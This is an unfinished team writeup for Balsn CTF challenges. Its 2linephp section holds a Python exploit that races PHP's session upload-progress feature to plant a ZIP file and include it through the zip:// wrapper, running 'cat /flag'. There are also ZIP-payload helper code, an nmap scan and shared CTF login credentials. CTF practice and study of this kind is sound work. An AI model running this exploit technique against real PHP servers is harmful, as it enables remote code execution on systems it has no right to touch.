# Balsn CTF Writeup
###### tags: `pentest log`
- contributor: [name=宏儒, <fill your name here>]
> This is a free-form space, so don't hold back and speak freely. Use markdown syntax as you like to write your ideas and process up as a writeup, and raise any problem you hit for discussion. We are not professionals, so the goal is to participate rather than to win; don't feel too much pressure. Hopefully brainstorming and technical exchange will help us all grow and get stronger each time!
```
Go to: https://balsnctf.com/challenges
and log in with teamname/pass: HollyBug/HollyBug
```
## Table of Contents
[TOC]
## Problem 1: 0linephp
###### tags: `Web`
2linephp is still too hard for me :(
Try this even more easier challenge - 0linephp
http://0linephp0.balsnctf.com
http://0linephp1.balsnctf.com
Attachment:
- 0linephp.zip
### Env Setup
```shell=
$ sudo docker-compose up
WARNING: Found orphan containers (dist_web_1) for this project. If you removed or renamed this service in your compose file, you can run this command with the --remove-orphans flag to clean it up.
Building apache
Step 1/2 : FROM httpd:2.4.48
2.4.48: Pulling from library/httpd
a330b6cecb98: Pull complete
14e3dd65f04d: Pull complete
fe59ad2e7efe: Pull complete
2cb26220caa8: Pull complete
3138742bd847: Pull complete
Digest: sha256:af1199cd77b018781e2610923f15e8a58ce22941b42ce63a6ae8b6e282af79f5
Status: Downloaded newer image for httpd:2.4.48
---> f34528d8e714
Step 2/2 : RUN echo 'Include conf/extra/proxy-php.conf' >> /usr/local/apache2/conf/httpd.conf
---> Running in cf39376a29a7
Removing intermediate container cf39376a29a7
---> 40e29a886e54
```
Then we check the website at the given URL:

Apparently, it's a blank page.
### Enumeration
### Vulnerability Analysis
### Exploit
---
## Problem 2: 2linephp
###### tags: `Web`
2linephp
0CTF 1linephp is too hard.
Try this super easy warmup challenge - 2linephp
http://2linephp1.balsnctf.com:50080/
http://2linephp2.balsnctf.com:50080/
Attachment:
- 2linephp.zip
### Env Setup
```shell=
$ sudo docker build -t ctf_2linephp . --no-cache
$ sudo docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ctf_2linephp latest 363baab6f993 52 seconds ago 432MB
$ sudo docker run ctf_2linephp
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the 'ServerName' directive globally to suppress this message
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the 'ServerName' directive globally to suppress this message
......snip.....
OR
$ chmod +x restart.sh
$ sudo ./restart.sh
[sudo] password for steve:
Removing network dist_default
WARNING: Network dist_default not found.
Creating network "dist_default" with the default driver
Building web
Step 1/8 : FROM php:7.4.11-apache
---> fb9212e0da7b
Step 2/8 : RUN sed -i 's/deb.debian.org/mirror.sjtu.edu.cn/g' /etc/apt/sources.list && sed -i 's/security.debian.org/mirror.sjtu.edu.cn/g' /etc/apt/sources.list && apt-get update -y && apt-get install gcc -y
---> Using cache
```
### Enumeration
After the environment setup, open one of the URLs mentioned above: http://2linephp2.balsnctf.com:50080/ or http://2linephp1.balsnctf.com:50080/. You will see:

It's PHP 7.4.11 (the image is `php:7.4.11-apache`), what now??? ~~Help~~~
:::info
```php
<?php ($_=$_SERVER['REQUEST_URI']) && (stripos($_,"zip") !== FALSE || stripos($_,"p:") || stripos($_,"s:")) && die("Bad hacker!");
($_=@$_GET['kaibro'].'.php') && @substr(file($_)[0],0,5) === '<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.php');
```
:::
### Vulnerability Analysis
```
root@ab22ff82a040:/var/www/html# cat /flag
BALSN{fake flag}
```
Since the PHP source itself gave me no further clue,
I turned my focus to the problem hint:
> 0CTF 1linephp is too hard.
> Try this super easy warmup challenge - 2linephp
So I did some research on 0CTF 1linephp and how other people solved it. I saw that others wrote a [python script](https://ctftime.org/writeup/29121) that talks to PHP over a raw socket, and I altered some details.
```python=
import requests
import socket

port = 50080
# Session id chosen by the attacker; PHP creates /tmp/sess_<id> for it
php_session_id = "dd9c6236c439f75b78cf6ef8d1efca31"
# Value of the PHP_SESSION_UPLOAD_PROGRESS form field: a small ZIP archive
# holding include.php. The whole value is written into the session file
# while the upload is still in flight.
payload = b"ccl_PK\x03\x04\x14\x00\x00\x00\x08\x00\xe5Q\xd9Rs\xaei\xe7\x1d\x00\x00\x00 \x00\x00\x00\x0b\x00\x1c\x00include.phpUT\t\x00\x03-<\xd5`-<\xd5`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00s\xb0\xb1/\xc8(PHM\xce\xc8WP\x89ww\r\x896\x88\xd5\x800\x0cc5\xad\xb9\x00PK\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xe5Q\xd9Rs\xaei\xe7\x1d\x00\x00\x00 \x00\x00\x00\x0b\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x14\x00\x00\x00include.phpUT\x05\x00\x03-<\xd5`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00Q\x00\x00\x00v\x00\x00\x00\x00\x00"


def exp():
    # Fired while the upload is still open, so the session file exists and
    # still contains the upload_progress entry (i.e. the ZIP payload)
    res = requests.get(
        f"http://2linephp1.balsnctf.com:50080/",
        params={
            "yxxx": f"zip:///tmp/sess_{php_session_id}#include",
            "0": "system",
            "1": "cat /flag",
        },
    )
    print(res.text)


def build_http_request_packet(req: requests.PreparedRequest):
    # Serialise a prepared request into raw bytes so it can be sent piecemeal
    packet = b""
    packet += f"{req.method} {req.path_url} HTTP/1.1\r\n".encode()
    for header, value in req.headers.items():
        packet += f"{header}: {value}\r\n".encode()
    packet += b"\r\n"
    if req.body is not None:
        if "Content-Length" in req.headers:
            if type(req.body) is str:
                packet += req.body.encode()
            else:
                packet += req.body
        else:
            # no Content-Length: emit the body with chunked transfer encoding
            for part in req.body:
                packet += f"{len(part):x}\r\n".encode()
                packet += f"{part}\r\n".encode()
            packet += b"0\r\n\r\n"
    return packet


def do_so():
    req = requests.Request(
        "POST",
        f"http://2linephp1.balsnctf.com:50080/",
        headers={"Host": f"http://2linephp1.balsnctf.com:50080/"},
        cookies={"PHPSESSID": php_session_id},
        data={
            "PHP_SESSION_UPLOAD_PROGRESS": payload,
        },
        # a large dummy file keeps the upload (and the session entry) alive
        files={"file": ("simple.txt", b"ccl" * 4096)},
    )
    packet = build_http_request_packet(req.prepare())
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("2linephp1.balsnctf.com", port))
    # Send everything but the tail of the multipart body so the upload stays
    # in progress, include the session file, then finish the upload
    s.sendall(packet[:-8])
    exp()
    s.sendall(packet[-8:])
    s.close()


if __name__ == "__main__":
    do_so()
```
Some parameters still need to be altered, especially `php_session_id` and `payload`. Note also that the script still sends the 1linephp parameter name `yxxx` and a `zip://` wrapper, while the 2linephp source reads `$_GET['kaibro']` and dies as soon as the request URI contains `zip`, `p:` or `s:`.
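To make the two guards in the challenge source concrete, and to stop hand-editing the hardcoded `payload` bytes, here is an added Python example (mine, not from the challenge, the page's script, or the referenced writeups). It models the `REQUEST_URI` filter and the `file($_)[0]` check in Python, builds a fresh ZIP archive with an `include.php` entry using the standard `zipfile` module, and shows what the session file looks like while the upload is in flight: the default `upload_progress_` prefix, the field value, then the php-serialised progress array. The function names, the sample PHP body and the serialised array body are my own constructions, and the progress array is a stand-in rather than a copy of a real session file. The final check only shows that Python's `zipfile` can still locate the embedded archive despite leading and trailing bytes; whether PHP's `zip://` wrapper (libzip) accepts the same framing is a separate property that the real attack depends on.

```python
import io
import zipfile

# Constructed sample PHP for the archive entry. Only the first five bytes of
# the first line matter to the challenge's guard; the rest is illustrative.
INCLUDE_PHP = b"<?php echo 'hello from include.php';\n"


def request_uri_blocked(request_uri: str) -> bool:
    """Model of the first line of the challenge:
    stripos($_,"zip") !== FALSE || stripos($_,"p:") || stripos($_,"s:")
    stripos() is case-insensitive, hence lower(). The "p:" and "s:" tests
    rely on PHP truthiness, so a hit at offset 0 would not count; since a
    REQUEST_URI always starts with "/", any hit at all is fatal in practice."""
    haystack = request_uri.lower()
    return (
        haystack.find("zip") != -1
        or haystack.find("p:") > 0
        or haystack.find("s:") > 0
    )


def passes_include_guard(file_bytes: bytes) -> bool:
    """Model of @substr(file($_)[0],0,5) === '<?php': only the first line of
    the target is read, and only its first five bytes are compared."""
    first_line = file_bytes.split(b"\n", 1)[0]
    return first_line[:5] == b"<?php"


def build_zip_payload(entry_name: str = "include.php",
                      source: bytes = INCLUDE_PHP) -> bytes:
    """Build a minimal deflated ZIP archive holding one PHP entry. This is the
    kind of blob the script above hardcodes as `payload`."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, source)
    return buf.getvalue()


def session_file_image(progress_value: bytes) -> bytes:
    """Approximate what PHP writes to /tmp/sess_<id> while a multipart upload
    carrying a PHP_SESSION_UPLOAD_PROGRESS field is in flight: the default
    prefix "upload_progress_" plus the field value, then "|" and the
    php-serialised progress array (constructed stand-in, not a real dump)."""
    serialised = b'a:2:{s:10:"start_time";i:0;s:4:"done";b:0;}'
    return b"upload_progress_" + progress_value + b"|" + serialised


def extract_entry(blob: bytes, entry_name: str) -> bytes:
    """Read one entry from a blob that embeds a ZIP archive between unrelated
    bytes. zipfile finds the end-of-central-directory record from the tail
    and corrects header offsets for the leading junk, so this is a quick
    structural check that the embedded archive is still intact."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return zf.read(entry_name)


if __name__ == "__main__":
    image = session_file_image(b"ccl_" + build_zip_payload())
    print(image[:40])
    print(extract_entry(image, "include.php"))
    print(request_uri_blocked("/?kaibro=zip:///tmp/sess_x%23include"))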
### Exploit
### Reference
[Writeup of 0ctf-2021/1linephp](https://github.com/waderwu/My-CTF-Challenges/blob/master/0ctf-2021/1linephp/writeup/1linephp_writeup_en.md)
[Another writeup of 1linephp](https://blog.maple3142.net/2021/07/05/0CTF-2021-quals-writeups/#web)
---
## Problem 3: Proxy
### Enumeration
```
$ dig proxy.balsnctf.com +noall +answer
proxy.balsnctf.com. 300 IN A 34.81.156.12
$ sudo nmap -Pn -sV -A 34.81.156.12
[sudo] password for song856854132:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-21 00:22 CST
Nmap scan report for 12.156.81.34.bc.googleusercontent.com (34.81.156.12)
Host is up (0.017s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http istio-envoy
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| HTTP/1.1 400 Bad Request
| content-length: 0
| connection: close
| FourOhFourRequest:
| HTTP/1.1 426 Upgrade Required
| date: Sat, 20 Nov 2021 08:22:55 GMT
| server: istio-envoy
| content-length: 0
| GetRequest:
| HTTP/1.1 426 Upgrade Required
| date: Sat, 20 Nov 2021 08:22:42 GMT
| server: istio-envoy
| content-length: 0
| HTTPOptions:
| HTTP/1.1 426 Upgrade Required
| date: Sat, 20 Nov 2021 08:22:47 GMT
| server: istio-envoy
|_ content-length: 0
|_http-server-header: istio-envoy
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
443/tcp closed https
3389/tcp closed ms-wbt-server
```
### Vulnerability Analysis
::: spoiler Envoy Heap Overflow Explanation
1
2
3
4
5
6
7
:::
### Exploit
### Reference
[Envoy Official Blog: Exploiting an Envoy heap vulnerability](https://blog.envoyproxy.io/exploiting-an-envoy-heap-vulnerability-96173d41792)
---
## Problem 4:
### Enumeration
### Vulnerability Analysis
### Exploit
---
## Problem 5:
### Enumeration
### Vulnerability Analysis
### Exploit
---
## Problem 6:
### Enumeration
### Vulnerability Analysis
### Exploit